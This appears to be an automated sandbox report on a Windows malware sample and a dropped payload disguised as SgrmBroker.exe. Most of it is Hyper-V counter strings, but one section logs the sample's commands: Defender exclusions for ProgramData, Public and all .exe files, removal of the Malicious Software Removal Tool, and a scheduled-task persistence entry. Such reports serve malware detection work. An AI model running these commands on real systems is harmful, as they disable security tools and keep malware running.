Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD00E000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD001000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DHyper-V Hypervisor Root Partition3
Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD00E000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD001000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DHyper-V Virtual Machine Bus PipesYE4
Source: SgrmBroker.exe, 00000018.00000003.2374418575.00000236ACAB3000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2377462053.00000236ACAB3000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2374630747.00000236ACAB3000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2374902804.00000236ACAB3000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2374697966.00000236ACAB3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interru
Source: SgrmBroker.exe, 00000018.00000003.2377021004.00000236AB074000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 4866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Accesses Cost5036Page Fault Intercepts/sec5038Page Fault Intercepts Cost5040NMI Interrupts/sec5042NMI Interrupts Cost5044Guest Page Table Maps/sec5046Large Page TLB Fills/sec5048Small Page TLB Fills/sec5050Reflected Guest Page Faults/sec5052APIC MMIO Accesses/sec5054IO Intercept Messages/sec5056Memory Intercept Messages/sec5058APIC EOI Accesses/sec5060Other Messages/sec5062Page Table Allocations/sec5064Logical Processor Migrations/sec5066Address Space Evictions/sec5068Address Space Switches/sec5070Address Domain Flushes/sec5072Address Space Flushes/sec5074Global GVA Range Flushes/sec5076Local Flushed GVA Range
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Virtual Machine Bus Pipesl
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AlDHyper-V Virtual Machine Bus Pipes
Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2444417839.00000236AD049000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD048000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Virtual Machine BusLwQ
Source: SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD038000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD039000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Logical Processormui7\O
Source: SgrmBroker.exe, 00000018.00000002.2572548806.00000236AAFA7000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2424523609.00000236AD00E000.00000004.00000020.00020000.00000000.sdmp, SgrmBroker.exe, 00000018.00000003.2445898978.00000236AD001000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JHyper-V Hypervisor Logical ProcessorGE"
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1656543805.00000245B0E4F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1653171137.00000245B0E5D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1655673640.00000245B0E5D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1651694113.00000245B0E4F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Re
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B11CC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1674564791.00000245B124A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1651759830.00000245B0E41000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1652899480.00000245B0E4D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1652596169.00000245B0E4D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1652293425.00000245B0E4D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1652771513.00000245B0E4D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process information queried: ProcessInformation
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9DBF6C0 IsDebuggerPresent, 24_2_00007FF6D9DBF6C0
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9CF1680 RtlReAllocateHeap,GetErrorInfo,SafeArrayDestroy,ProcessPrng,GetProcessHeap,HeapAlloc,GetErrorInfo,VariantClear,GetProcessHeap,HeapFree,VariantClear,HeapFree,HeapFree,HeapFree,HeapFree,SafeArrayDestroy,GetErrorInfo,HeapFree,HeapFree, 24_2_00007FF6D9CF1680
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Code function: 24_2_00007FF6D9DD8D8C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_00007FF6D9DD8D8C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath @($env:ProgramData, 'C:\Users\Public') -ExclusionExtension '.exe' -Force"
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe NtQueryInformationProcess: Indirect: 0x7FF6D9DCF3BC
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe NtQueryInformationProcess: Indirect: 0x7FF6D9DCF455
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe NtQueryInformationProcess: Indirect: 0x7FF6D9DCDEF5
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe NtQueryInformationProcess: Indirect: 0x7FF6D9DCE06C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe NtQueryInformationProcess: Indirect: 0x7FF60994161C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe NtQueryInformationProcess: Indirect: 0x7FF6099414A8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe NtQueryInformationProcess: Indirect: 0x7FF609942A25
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe NtQueryInformationProcess: Indirect: 0x7FF60994298C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c "wusa /uninstall /kb:890830 /quiet /norestart"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c "del /f /q %SystemRoot%\System32\MRT.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c "reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe "C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Process created: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe "C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add HKLM\SOFTWARE\Policies\Microsoft\MRT /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c "schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /Create /TR C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe /SC ONLOGON /TN TMPSYSUPD /F /RL highest
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1719566246.00000245B120C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1690429758.00000245B120C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd|
Source: SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1719566246.00000245B120C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe, 00000005.00000003.1690429758.00000245B120C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Queries volume information: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe Queries volume information: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\Public\Pictures_Old\AppData_Old\SppExtComObj.exe Code function: 23_2_00007FF684C84A40 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 23_2_00007FF684C84A40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Giant.Cerbu.75.14856.25265.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\ProgramData\Fonts_Backup\Music_1\SgrmBroker.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
No contacted IP infos